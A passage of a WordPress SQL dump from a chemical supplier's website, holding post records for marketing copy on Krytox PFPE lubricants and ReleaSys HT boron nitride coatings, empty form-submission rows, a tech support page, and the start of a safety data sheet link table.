types are shown in the table below. PFPE\'s are the best lubricant available.\r\n<h4><strong>The Difference PFPEs Can Make</strong></h4>\r\nFor ambient temperatures, the less expensive lubricant options work fine. Traditionally, PFPEs are not the first OEM choice due to price considerations. However, in extreme environments, cost benefit analyses are leading more OEMs to embrace PFPEs; they’re realizing that PFPEs provide a greater value for an increasing number of components, because they provide stable, lasting performance under harsh conditions. The initial price per unit is higher than common petroleum-based lubricants, but the PFPE benefits quickly outweigh the costs.\r\n\r\nThere are several common points of vulnerability in most plants — beginning with the multitude of valves and seals that are under extreme conditions. The high heat, exposure to chemicals and other operational conditions can have a detrimental effect on lubricant performance. It’s common for MROs using lower classifications of lubricant to re-lube these components on a frequent basis or accept failures; with PFPEs, that need is greatly reduced, freeing personnel for other tasks and minimizing downtime caused by the need to replace worn out components.\r\n\r\nPFPEs can also extend the life of electric motors – specifically, the bearings that so often are the cause of motor failures in plants. It’s typical for a motor that has failed because of oxidized bearings to be replaced, leading to an increased expense and, perhaps more importantly, lost productivity while the motor is being replaced. PFPEs will decrease wear on the bearings and can greatly increase the motor’s life and reliability.\r\n\r\n<img class="wp-image-3770 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2017/03/krytox-vs-competitors.jpg" alt="krytox vs competitors" width="539" height="302" />\r\n\r\nPFPEs are inert, insoluble, non-toxic, nonflammable, odorless and colorless. This means that they can withstand fuels, coolants, hydraulic fluids, engine oil, solvents and battery acids, delivering almost zero evaporation and no chemical changes over many years.\r\n\r\nBecause PFPEs provide longer lasting lubrication, this lowers the frequency of re-lubrication and reduces the amount of lubricant needed and reducing operating cost. Additionally, PFPEs are not petroleum-based, don’t have any volatile organic compounds (VOCs) and the oils are recyclable. All in all, it adds up to PFPEs having a reduced negative environmental impact.\r\n<h4><strong>About Krytox™ PFPE Lubricants</strong></h4>\r\n<a href="https://www.miller-stephenson.com/krytox/">Krytox™ lubricants</a> are Chemours’ line of high quality PFPE oils and greases, which have been proven to offer long term performance and superior value. These lubricants are PFPEs, resulting in exceptional chemical stability. Therefore, they are thermally stable, nonflammable and insoluble in water, acids, bases, and most organic and all non-fluorinated solvents.\r\n\r\nAdditionally, Krytox™ lubricants are <a href="https://www.iso.org/iso-9001-quality-management.html">ISO 9001</a> and <a href="https://www.iso.org/iso-14001-environmental-management.html">ISO 14001</a> certified, and several grades are <a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">NSF H-1</a>.\r\n\r\n<img class="wp-image-3771 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/03/krytox-pfpe-performance.jpg" alt="krytox-pfpe-performance" width="187" height="100" />\r\n<h4><strong>The attributes of Krytox™ lubricants include:</strong></h4>\r\n<strong>Performance over a wide temperature range</strong>\r\nExtreme heat or cold have no effect on the lubricity of these lubricants, effective from -75 °C to greater than 400 °C (-103 °F to 752 °F), depending upon operating conditions and product grade.\r\n\r\n<strong>Resistant to chemical attack</strong>\r\nKrytox™ lubricants withstand oxygen, acids and other aggressive substances.\r\n\r\n<strong>Low evaporation</strong>\r\nKrytox™ lubricants – within the recommended temperature ranges – experience almost zero evaporation or chemical changes over the many years of a machine’s service life.\r\n\r\n<strong>Compatibility</strong>\r\nKrytox™ lubricants won’t harm painted surfaces or most elastomeric materials. They are compatible with almost every material they may contact.\r\n\r\n<a href="https://www.miller-stephenson.com/contact/">Contact us</a> to find out why Krytox is the best lubricant available.', 'Do OEM Lubricant Recommendations Meet Your Current Needs?', '', 'inherit', 'closed', 'closed', '', '3767-revision-v1', '', '', '2017-03-01 17:19:37', '2017-03-01 17:19:37', '', 3767, 'https://www.miller-stephenson.com/3767-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3780, 0, '2017-03-01 19:50:57', '2017-03-01 19:50:57', '', '', '', 'publish', 'closed', 'closed', '', '3780', '', '', '2017-03-01 19:50:57', '2017-03-01 19:50:57', '', 0, 'https://www.miller-stephenson.com/nf_sub/3780/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3781, 0, '2017-03-01 21:01:12', '2017-03-01 21:01:12', '', '', '', 'publish', 'closed', 'closed', '', '3781', '', '', '2017-03-01 21:01:12', '2017-03-01 21:01:12', '', 0, 'https://www.miller-stephenson.com/nf_sub/3781/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3782, 0, '2017-03-01 21:26:50', '2017-03-01 21:26:50', '', '', '', 'publish', 'closed', 'closed', '', '3782', '', '', '2017-03-01 21:26:51', '2017-03-01 21:26:51', '', 0, 'https://www.miller-stephenson.com/nf_sub/3782/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3783, 0, '2017-03-01 22:33:43', '2017-03-01 22:33:43', '', '', '', 'publish', 'closed', 'closed', '', '3783', '', '', '2017-03-01 22:33:43', '2017-03-01 22:33:43', '', 0, 'https://www.miller-stephenson.com/nf_sub/3783/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3784, 0, '2017-03-02 19:39:53', '2017-03-02 19:39:53', '', '', '', 'publish', 'closed', 'closed', '', '3784', '', '', '2017-03-02 19:39:54', '2017-03-02 19:39:54', '', 0, 'https://www.miller-stephenson.com/nf_sub/3784/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3785, 0, '2017-03-02 20:43:24', '2017-03-02 20:43:24', '', '', '', 'publish', 'closed', 'closed', '', '3785', '', '', '2017-03-02 20:43:24', '2017-03-02 20:43:24', '', 0, 'https://www.miller-stephenson.com/nf_sub/3785/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3786, 0, '2017-03-02 22:14:08', '2017-03-02 22:14:08', '', '', '', 'publish', 'closed', 'closed', '', '3786', '', '', '2017-03-02 22:14:08', '2017-03-02 22:14:08', '', 0, 'https://www.miller-stephenson.com/nf_sub/3786/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3787, 3, '2017-03-03 20:06:17', '2017-03-03 20:06:17', '<h2>ReleaSys™ HT | Boron Nitride Coatings</h2>\r\n<h3>Water-based; High-Temperature Release Agent (600-1800°F)</h3>\r\nReleaSys<sup>™</sup> HT is a specialized, water-based release agent specifically designed for high temperature molding operations.  This formula utilizes a proprietary boron nitride complex to achieve unmatched lubricity and mold release performance. ReleaSys<sup>™</sup> HT boron nitride coatings prevent sticking to increase life of dies/molds, improve product surface finishes, and reduce production times. ReleaSys HT makes an excellent surface coating for molds used to produce castings of light metals such as magnesium and for coating surfaces in glass making operations. Our formulation is 100% VOC-free making it an eco-friendly and safer alternative to solvent-based alternatives. Applications include:\r\n<ul>\r\n 	<li>Mold Release for High Temperature and Difficult to Mold Polymers and Composites</li>\r\n 	<li>Mold release for Casting Metals and Glass</li>\r\n 	<li>Mold Dressing for Powder Metal Processing</li>\r\n 	<li>Surface Coating for High Temperature Surface</li>\r\n 	<li>Barrier Coating for Aggressive Environmental processes</li>\r\n 	<li>Specialty Lubricant for Drawing and Working Metals</li>\r\n</ul>\r\nBoron nitride coatings developed by proper application of ReleaSys HT are extremely durable and stable, allowing for longer operational time before re-application is necessary.  Miller-Stephenson\'s proprietary boron nitride complex technology allows for greater surface adhesion, lubricity, and stability meaning operators can mold more parts without the need for constant re-application.  Moreover our boron nitride coatings exhibit minimal mold fouling and transfer, allowing expensive molds to remain in service longer with the need for expensive re-surfacing to occur. Our boron nitride coating within ReleaSys HT can inhibit corrosion and chemical attack in metal forming, glass-making and sintering processes, thereby increasing die life and improving product quality.\r\n\r\n<a href="https://www.miller-stephenson.com/mold-release-agents/">For help with choosing which mold release is right for your application check out article section here</a>', 'ReleaSys™ HT | Boron Nitride Coatings', 'ReleaSys<sup>™</sup> HT is a specialized, water-based release agent specifically designed for high temperature molding operations.  This formula utilizes a proprietary boron nitride complex to achieve unmatched lubricity and mold release performance. The inert and non-wetting nature of ReleaSys<sup>™</sup> HT makes it an excellent surface coating for molds used to produce castings of light metals such as magnesium and for coating surfaces in glass making operations. Advantages include:\r\n<ul>\r\n 	<li>Water-based; VOC-free formula</li>\r\n 	<li>Enhanced surface adhesion and durability</li>\r\n 	<li>Protects Mold and Die Surfaces</li>\r\n 	<li>High Temperature Stability up to 1562°F (850°C) in air</li>\r\n</ul>', 'publish', 'closed', 'closed', '', 'boron-nitride-coatings', '', '', '2017-05-31 12:18:39', '2017-05-31 12:18:39', '', 0, 'https://www.miller-stephenson.com/?post_type=product&#038;p=3787', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (3788, 3, '2017-03-03 19:53:35', '2017-03-03 19:53:35', '', 'ReleaSys HT', '', 'inherit', 'closed', 'closed', '', 'releasys-ht', '', '', '2017-03-03 19:53:46', '2017-03-03 19:53:46', '', 3787, 'https://www.miller-stephenson.com/wp-content/uploads/2017/03/ReleaSys-HT.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3789, 3, '2017-03-03 20:05:16', '2017-03-03 20:05:16', 'ReleaSys HT', 'Boron Nitride Coatings', '', 'inherit', 'closed', 'closed', '', 'shutterstock_442773265', '', '', '2017-03-03 20:05:47', '2017-03-03 20:05:47', '', 3787, 'https://www.miller-stephenson.com/wp-content/uploads/2017/03/shutterstock_442773265.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3790, 0, '2017-03-05 18:12:34', '2017-03-05 18:12:34', '', '', '', 'publish', 'closed', 'closed', '', '3790', '', '', '2017-03-05 18:12:34', '2017-03-05 18:12:34', '', 0, 'https://www.miller-stephenson.com/nf_sub/3790/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3791, 0, '2017-03-06 07:47:52', '2017-03-06 07:47:52', '', '', '', 'publish', 'closed', 'closed', '', '3791', '', '', '2017-03-06 07:47:52', '2017-03-06 07:47:52', '', 0, 'https://www.miller-stephenson.com/nf_sub/3791/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3792, 0, '2017-03-06 09:49:20', '2017-03-06 09:49:20', '', '', '', 'publish', 'closed', 'closed', '', '3792', '', '', '2017-03-06 09:49:21', '2017-03-06 09:49:21', '', 0, 'https://www.miller-stephenson.com/nf_sub/3792/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3794, 1, '2017-03-06 11:14:42', '2017-03-06 11:14:42', '', '', '', 'publish', 'closed', 'closed', '', '3794', '', '', '2017-03-06 11:14:43', '2017-03-06 11:14:43', '', 0, 'https://www.miller-stephenson.com/nf_sub/3794/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3795, 0, '2017-03-06 13:16:35', '2017-03-06 13:16:35', '', '', '', 'publish', 'closed', 'closed', '', '3795', '', '', '2017-03-06 13:16:36', '2017-03-06 13:16:36', '', 0, 'https://www.miller-stephenson.com/nf_sub/3795/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3796, 39, '2017-03-06 13:20:27', '2017-03-06 13:20:27', '', '', '', 'publish', 'closed', 'closed', '', '3796', '', '', '2017-03-06 13:20:28', '2017-03-06 13:20:28', '', 0, 'https://www.miller-stephenson.com/nf_sub/3796/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3798, 0, '2017-03-06 14:34:30', '2017-03-06 14:34:30', '', '', '', 'publish', 'closed', 'closed', '', '3798', '', '', '2017-03-06 14:34:31', '2017-03-06 14:34:31', '', 0, 'https://www.miller-stephenson.com/nf_sub/3798/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3799, 0, '2017-03-06 15:14:52', '2017-03-06 15:14:52', '', '', '', 'publish', 'closed', 'closed', '', '3799', '', '', '2017-03-06 15:14:52', '2017-03-06 15:14:52', '', 0, 'https://www.miller-stephenson.com/nf_sub/3799/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3800, 1, '2017-03-06 17:11:47', '2017-03-06 17:11:47', '', '', '', 'publish', 'closed', 'closed', '', '3800', '', '', '2017-03-06 17:11:47', '2017-03-06 17:11:47', '', 0, 'https://www.miller-stephenson.com/nf_sub/3800/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3801, 1, '2017-03-06 17:18:35', '2017-03-06 17:18:35', '', '', '', 'publish', 'closed', 'closed', '', '3801', '', '', '2017-03-06 17:18:35', '2017-03-06 17:18:35', '', 0, 'https://www.miller-stephenson.com/nf_sub/3801/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3802, 1, '2017-03-06 17:32:20', '2017-03-06 17:32:20', '', '', '', 'publish', 'closed', 'closed', '', '3802', '', '', '2017-03-06 17:32:20', '2017-03-06 17:32:20', '', 0, 'https://www.miller-stephenson.com/nf_sub/3802/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3804, 1, '2017-03-06 17:41:07', '2017-03-06 17:41:07', '', '', '', 'publish', 'closed', 'closed', '', '3804', '', '', '2017-03-06 17:41:07', '2017-03-06 17:41:07', '', 0, 'https://www.miller-stephenson.com/nf_sub/3804/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3805, 1, '2017-03-06 17:46:30', '2017-03-06 17:46:30', '', '', '', 'publish', 'closed', 'closed', '', '3805', '', '', '2017-03-06 17:46:30', '2017-03-06 17:46:30', '', 0, 'https://www.miller-stephenson.com/nf_sub/3805/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3806, 0, '2017-03-06 18:05:18', '2017-03-06 18:05:18', '', '', '', 'publish', 'closed', 'closed', '', '3806', '', '', '2017-03-06 18:05:19', '2017-03-06 18:05:19', '', 0, 'https://www.miller-stephenson.com/nf_sub/3806/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3807, 1, '2017-03-06 19:32:49', '2017-03-06 19:32:49', '', '', '', 'publish', 'closed', 'closed', '', '3807', '', '', '2017-03-06 19:32:49', '2017-03-06 19:32:49', '', 0, 'https://www.miller-stephenson.com/nf_sub/3807/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3808, 0, '2017-03-06 20:14:46', '2017-03-06 20:14:46', '', '', '', 'publish', 'closed', 'closed', '', '3808', '', '', '2017-03-06 20:14:46', '2017-03-06 20:14:46', '', 0, 'https://www.miller-stephenson.com/nf_sub/3808/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3809, 1, '2017-03-06 20:26:40', '2017-03-06 20:26:40', '', '', '', 'publish', 'closed', 'closed', '', '3809', '', '', '2017-03-06 20:26:41', '2017-03-06 20:26:41', '', 0, 'https://www.miller-stephenson.com/nf_sub/3809/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3810, 1, '2017-03-06 21:42:20', '2017-03-06 21:42:20', '', '', '', 'publish', 'closed', 'closed', '', '3810', '', '', '2017-03-06 21:42:21', '2017-03-06 21:42:21', '', 0, 'https://www.miller-stephenson.com/nf_sub/3810/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3811, 1, '2017-03-06 21:44:29', '2017-03-06 21:44:29', '', '', '', 'publish', 'closed', 'closed', '', '3811', '', '', '2017-03-06 21:44:30', '2017-03-06 21:44:30', '', 0, 'https://www.miller-stephenson.com/nf_sub/3811/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3812, 1, '2017-03-06 21:49:46', '2017-03-06 21:49:46', '', '', '', 'publish', 'closed', 'closed', '', '3812', '', '', '2017-03-06 21:49:47', '2017-03-06 21:49:47', '', 0, 'https://www.miller-stephenson.com/nf_sub/3812/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3813, 0, '2017-03-06 22:03:13', '2017-03-06 22:03:13', '', '', '', 'publish', 'closed', 'closed', '', '3813', '', '', '2017-03-06 22:03:13', '2017-03-06 22:03:13', '', 0, 'https://www.miller-stephenson.com/nf_sub/3813/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3814, 1, '2017-03-07 01:27:54', '2017-03-07 01:27:54', '', '', '', 'publish', 'closed', 'closed', '', '3814', '', '', '2017-03-07 01:27:55', '2017-03-07 01:27:55', '', 0, 'https://www.miller-stephenson.com/nf_sub/3814/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3815, 1, '2017-03-07 01:31:39', '2017-03-07 01:31:39', '', '', '', 'publish', 'closed', 'closed', '', '3815', '', '', '2017-03-07 01:31:39', '2017-03-07 01:31:39', '', 0, 'https://www.miller-stephenson.com/nf_sub/3815/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3816, 1, '2017-03-07 01:33:23', '2017-03-07 01:33:23', '', '', '', 'publish', 'closed', 'closed', '', '3816', '', '', '2017-03-07 01:33:24', '2017-03-07 01:33:24', '', 0, 'https://www.miller-stephenson.com/nf_sub/3816/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3817, 1, '2017-03-07 01:40:03', '2017-03-07 01:40:03', '', '', '', 'publish', 'closed', 'closed', '', '3817', '', '', '2017-03-07 01:40:03', '2017-03-07 01:40:03', '', 0, 'https://www.miller-stephenson.com/nf_sub/3817/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3818, 1, '2017-03-07 02:13:22', '2017-03-07 02:13:22', '', '', '', 'publish', 'closed', 'closed', '', '3818', '', '', '2017-03-07 02:13:22', '2017-03-07 02:13:22', '', 0, 'https://www.miller-stephenson.com/nf_sub/3818/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3819, 0, '2017-03-07 03:32:14', '2017-03-07 03:32:14', '', '', '', 'publish', 'closed', 'closed', '', '3819', '', '', '2017-03-07 03:32:15', '2017-03-07 03:32:15', '', 0, 'https://www.miller-stephenson.com/nf_sub/3819/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3820, 0, '2017-03-07 06:52:28', '2017-03-07 06:52:28', '', '', '', 'publish', 'closed', 'closed', '', '3820', '', '', '2017-03-07 06:52:28', '2017-03-07 06:52:28', '', 0, 'https://www.miller-stephenson.com/nf_sub/3820/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3821, 0, '2017-03-07 08:28:12', '2017-03-07 08:28:12', '', '', '', 'publish', 'closed', 'closed', '', '3821', '', '', '2017-03-07 08:28:12', '2017-03-07 08:28:12', '', 0, 'https://www.miller-stephenson.com/nf_sub/3821/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3822, 488, '2017-03-07 18:03:15', '2017-03-07 18:03:15', '', '', '', 'publish', 'closed', 'closed', '', '3822', '', '', '2017-03-07 18:03:16', '2017-03-07 18:03:16', '', 0, 'https://www.miller-stephenson.com/nf_sub/3822/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3823, 510, '2017-03-07 18:29:58', '2017-03-07 18:29:58', '', '', '', 'publish', 'closed', 'closed', '', '3823', '', '', '2017-03-07 18:29:58', '2017-03-07 18:29:58', '', 0, 'https://www.miller-stephenson.com/nf_sub/3823/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3824, 0, '2017-03-07 19:37:16', '2017-03-07 19:37:16', '', '', '', 'publish', 'closed', 'closed', '', '3824', '', '', '2017-03-07 19:37:17', '2017-03-07 19:37:17', '', 0, 'https://www.miller-stephenson.com/nf_sub/3824/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3825, 0, '2017-03-07 19:58:14', '2017-03-07 19:58:14', '', '', '', 'publish', 'closed', 'closed', '', '3825', '', '', '2017-03-07 19:58:14', '2017-03-07 19:58:14', '', 0, 'https://www.miller-stephenson.com/nf_sub/3825/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3826, 0, '2017-03-08 00:54:37', '2017-03-08 00:54:37', '', '', '', 'publish', 'closed', 'closed', '', '3826', '', '', '2017-03-08 00:54:37', '2017-03-08 00:54:37', '', 0, 'https://www.miller-stephenson.com/nf_sub/3826/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3827, 0, '2017-03-08 03:21:24', '2017-03-08 03:21:24', '', '', '', 'publish', 'closed', 'closed', '', '3827', '', '', '2017-03-08 03:21:25', '2017-03-08 03:21:25', '', 0, 'https://www.miller-stephenson.com/nf_sub/3827/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3828, 0, '2017-03-08 04:20:33', '2017-03-08 04:20:33', '', '', '', 'publish', 'closed', 'closed', '', '3828', '', '', '2017-03-08 04:20:33', '2017-03-08 04:20:33', '', 0, 'https://www.miller-stephenson.com/nf_sub/3828/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3829, 0, '2017-03-08 07:21:31', '2017-03-08 07:21:31', '', '', '', 'publish', 'closed', 'closed', '', '3829', '', '', '2017-03-08 07:21:31', '2017-03-08 07:21:31', '', 0, 'https://www.miller-stephenson.com/nf_sub/3829/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3830, 0, '2017-03-08 13:08:11', '2017-03-08 13:08:11', '', '', '', 'publish', 'closed', 'closed', '', '3830', '', '', '2017-03-08 13:08:12', '2017-03-08 13:08:12', '', 0, 'https://www.miller-stephenson.com/nf_sub/3830/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3831, 0, '2017-03-08 13:16:19', '2017-03-08 13:16:19', '', '', '', 'publish', 'closed', 'closed', '', '3831', '', '', '2017-03-08 13:16:19', '2017-03-08 13:16:19', '', 0, 'https://www.miller-stephenson.com/nf_sub/3831/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3832, 0, '2017-03-08 14:14:52', '2017-03-08 14:14:52', '', '', '', 'publish', 'closed', 'closed', '', '3832', '', '', '2017-03-08 14:14:52', '2017-03-08 14:14:52', '', 0, 'https://www.miller-stephenson.com/nf_sub/3832/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3833, 0, '2017-03-08 15:19:33', '2017-03-08 15:19:33', '', '', '', 'publish', 'closed', 'closed', '', '3833', '', '', '2017-03-08 15:19:34', '2017-03-08 15:19:34', '', 0, 'https://www.miller-stephenson.com/nf_sub/3833/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3834, 0, '2017-03-08 16:06:16', '2017-03-08 16:06:16', '', '', '', 'publish', 'closed', 'closed', '', '3834', '', '', '2017-03-08 16:06:16', '2017-03-08 16:06:16', '', 0, 'https://www.miller-stephenson.com/nf_sub/3834/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3835, 0, '2017-03-08 17:00:24', '2017-03-08 17:00:24', '', '', '', 'publish', 'closed', 'closed', '', '3835', '', '', '2017-03-08 17:00:24', '2017-03-08 17:00:24', '', 0, 'https://www.miller-stephenson.com/nf_sub/3835/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3836, 0, '2017-03-08 17:29:28', '2017-03-08 17:29:28', '', '', '', 'publish', 'closed', 'closed', '', '3836', '', '', '2017-03-08 17:29:29', '2017-03-08 17:29:29', '', 0, 'https://www.miller-stephenson.com/nf_sub/3836/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3837, 0, '2017-03-08 21:24:01', '2017-03-08 21:24:01', '', '', '', 'publish', 'closed', 'closed', '', '3837', '', '', '2017-03-08 21:24:01', '2017-03-08 21:24:01', '', 0, 'https://www.miller-stephenson.com/nf_sub/3837/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3838, 0, '2017-03-08 21:42:39', '2017-03-08 21:42:39', '', '', '', 'publish', 'closed', 'closed', '', '3838', '', '', '2017-03-08 21:42:39', '2017-03-08 21:42:39', '', 0, 'https://www.miller-stephenson.com/nf_sub/3838/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3839, 0, '2017-03-09 08:50:51', '2017-03-09 08:50:51', '', '', '', 'publish', 'closed', 'closed', '', '3839', '', '', '2017-03-09 08:50:52', '2017-03-09 08:50:52', '', 0, 'https://www.miller-stephenson.com/nf_sub/3839/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3840, 0, '2017-03-09 12:32:36', '2017-03-09 12:32:36', '', '', '', 'publish', 'closed', 'closed', '', '3840', '', '', '2017-03-09 12:32:37', '2017-03-09 12:32:37', '', 0, 'https://www.miller-stephenson.com/nf_sub/3840/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3841, 0, '2017-03-09 13:56:59', '2017-03-09 13:56:59', '', '', '', 'publish', 'closed', 'closed', '', '3841', '', '', '2017-03-09 13:56:59', '2017-03-09 13:56:59', '', 0, 'https://www.miller-stephenson.com/nf_sub/3841/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3842, 0, '2017-03-09 15:04:13', '2017-03-09 15:04:13', '', '', '', 'publish', 'closed', 'closed', '', '3842', '', '', '2017-03-09 15:04:13', '2017-03-09 15:04:13', '', 0, 'https://www.miller-stephenson.com/nf_sub/3842/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3843, 0, '2017-03-09 15:40:54', '2017-03-09 15:40:54', '', '', '', 'publish', 'closed', 'closed', '', '3843', '', '', '2017-03-09 15:40:55', '2017-03-09 15:40:55', '', 0, 'https://www.miller-stephenson.com/nf_sub/3843/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3844, 0, '2017-03-09 17:02:21', '2017-03-09 17:02:21', '', '', '', 'publish', 'closed', 'closed', '', '3844', '', '', '2017-03-09 17:02:21', '2017-03-09 17:02:21', '', 0, 'https://www.miller-stephenson.com/nf_sub/3844/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3845, 0, '2017-03-09 17:34:46', '2017-03-09 17:34:46', '', '', '', 'publish', 'closed', 'closed', '', '3845', '', '', '2017-03-09 17:34:46', '2017-03-09 17:34:46', '', 0, 'https://www.miller-stephenson.com/nf_sub/3845/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3846, 0, '2017-03-09 17:37:21', '2017-03-09 17:37:21', '', '', '', 'publish', 'closed', 'closed', '', '3846', '', '', '2017-03-09 17:37:21', '2017-03-09 17:37:21', '', 0, 'https://www.miller-stephenson.com/nf_sub/3846/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3847, 0, '2017-03-10 01:39:06', '2017-03-10 01:39:06', '', '', '', 'publish', 'closed', 'closed', '', '3847', '', '', '2017-03-10 01:39:06', '2017-03-10 01:39:06', '', 0, 'https://www.miller-stephenson.com/nf_sub/3847/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3848, 0, '2017-03-10 08:40:43', '2017-03-10 08:40:43', '', '', '', 'publish', 'closed', 'closed', '', '3848', '', '', '2017-03-10 08:40:43', '2017-03-10 08:40:43', '', 0, 'https://www.miller-stephenson.com/nf_sub/3848/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3849, 2, '2017-03-10 15:10:29', '2017-03-10 15:10:29', '<h3>For URGENT requests, please call us at: 800-442-3424 (8-4 EST)</h3>\r\n<h4>Technical Support Request Form:</h4>\r\n[ninja_form id=11]', 'Tech Support', '', 'inherit', 'closed', 'closed', '', '122-revision-v1', '', '', '2017-03-10 15:10:29', '2017-03-10 15:10:29', '', 122, 'https://www.miller-stephenson.com/122-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3850, 2, '2017-03-10 15:13:29', '2017-03-10 15:13:29', '', 'krytox-280-series', '', 'inherit', 'closed', 'closed', '', 'krytox-280-series', '', '', '2017-03-10 15:13:29', '2017-03-10 15:13:29', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2017/03/Krytox-280-series.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3851, 2, '2017-03-10 15:13:46', '2017-03-10 15:13:46', '<h1>Miller-Stephenson SDS database.</h1>\r\nIf you are unable to locate the specific SDS you need, please contact our Technical Support at support@mschem.com or 203-743-4447 (8-4 E.T.)\r\n<table width="1119">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="219"><strong>Aerosol</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Liquid</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Release Agents</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Conformal Coatings</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Krytox</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Epoxy</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/124H.pdf">MS-124H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/111.pdf">MS-111</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122AD.pdf">MS-122AD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/452N.pdf">MS-452N</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AGL683.pdf">AGL 683</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/900.pdf">MS-900</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222L.pdf">MS-222L</a></td>\r\n<td 